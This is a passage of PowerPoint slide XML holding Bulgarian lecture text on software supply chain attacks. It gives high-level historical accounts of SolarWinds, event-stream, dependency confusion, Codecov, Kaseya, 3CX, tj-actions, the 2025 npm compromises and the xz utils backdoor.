            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>реално</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>активно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>експлоатирани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около</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>компании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9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>федерални</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>агенции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САЩ — Treasury, Commerce, DHS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>плюс</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>и</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> FireEye.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Откриването</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>идва</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>чак</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>през</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>декември</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2020, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>когато</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> FireEye </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>разследва</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>кражбата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собствените</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>си</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> red team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>инструменти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013924EA-1FBF-21F7-EF2A-F971419B283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07106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FA27D036-868F-DAD0-F534-7CB0FEC6F4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55BC0969-38A1-1A1B-B813-17917E52FA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Ако</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>трябва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запомните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едно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SolarWinds: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>signuture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>доказва</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> КОЙ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>е</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> build-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>нал</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>кода</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> —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че</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>кодът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безопасен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Кодът</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>беше</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>подписан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истинския</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>сертификат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SolarWinds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пак</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>беше</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>зловреден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Доверието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подписа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доверие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съдържанието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F50CED34-77BB-8020-ECF3-F250E6BB93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749832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EC5061C7-BF44-28DA-BF3B-9AA3485B9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81E702F4-7DB9-E6E1-E166-2AB9B64C8B8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единичен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>случай</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ето</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>кратка</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>галерия</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. event-stream 2018: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>поддръжникът</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>предава</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>проекта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доброволец</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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таргетира</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Copay bitcoin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>портфейли</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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Dependency confusion 2021: Alex Birsan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>публикува</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>публични</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пакети</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>със</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>същите</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>имена</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>като</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>вътрешните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Apple, Microsoft, PayPal. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Codecov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>модифициран</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bash uploader </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>краде</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> secrets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>от</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> CI. Kaseya: REvil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>удря</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> MSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>инструмент</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ~1500 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>бизнеса</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>получават</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ransomware. 3CX 2023: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>първата</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>двойна</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> supply chain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>атака</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-actions 2025: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>компрометиран</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> GitHub Action </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>изтича</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> secrets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логовете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хиляди</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> repo-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>та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3AD1BDA4-5192-18C3-A77F-02048A9E57D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382108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7B333CF8-FDDA-4609-70E5-4E7016B11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DFBEADC8-EE8D-54E1-C15D-A8197A03D5A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Септември</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2025 — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>стана</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>лично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. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Фишинг</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>срещу</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> maintainer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>компрометира</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> chalk, debug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други</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пакети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МИЛИАРДИ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>седмични</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>изтегляния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Скоро</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>след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идва</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Shai-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hulud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>самовъзпроизвеждащ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worm.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Той</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>краде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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>токени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после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тях</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>публикува</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>заразени</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>версии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още</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пакети</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>разпространявайки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сам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Открадат</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>токен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автоматизирана</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>екосистема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пробив</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> —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верижна</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>реакция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4EFF5C67-B617-5462-9D77-7CEA5FDEB89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8113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367A4AB8-B188-C9D1-61ED-B79B2E6F0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A4FD89AE-3E28-5958-E15E-75DDBBB1DE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xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> utils, 2024 — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>най-добрата</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>история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лекцията</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>разказвам</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>я</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>като</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>трилър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Години</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>наред</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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акаунт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име</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Jia Tan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>печели</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>доверие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open-source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>проект</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>чрез</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>социално</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>инженерство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Накрая</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>получава</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> maintainer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>права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вкарва</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> backdoor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>насочен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>към</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>тоест</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>към</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SSH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практически</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>всеки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>сървър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тук</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>идва</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>обратът</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Andres Freund, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>инженер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Microsoft, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>забелязва</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>че</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>логините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около</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 500 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>по-бавни</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>отколкото</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>трябва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Любопитството</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>му</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>го</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>кара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разследва</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> —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спира</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> backdoor,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беше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дни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стигне</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>до</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>целия</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>свят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Истината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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>имахме</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>късмет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Нямаше</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>система</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>която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го</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>хване</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>хвана</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>го</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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любопитен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>инженер</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t>Точно това се надявам да запаля във Вас</a:t>
            </a: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1B4056E3-FD2F-70AB-F9E5-53FB6BB1601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18670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665EB170-3262-5DC2-7D53-8EFD2730E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1F3BC2E9-14B4-5B82-92ED-F0BA98AD81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съберем</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>векторите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едно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>място</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>целта</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>винаги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една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съща</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: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накараш</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>доверието</a:t>
            </a:r>
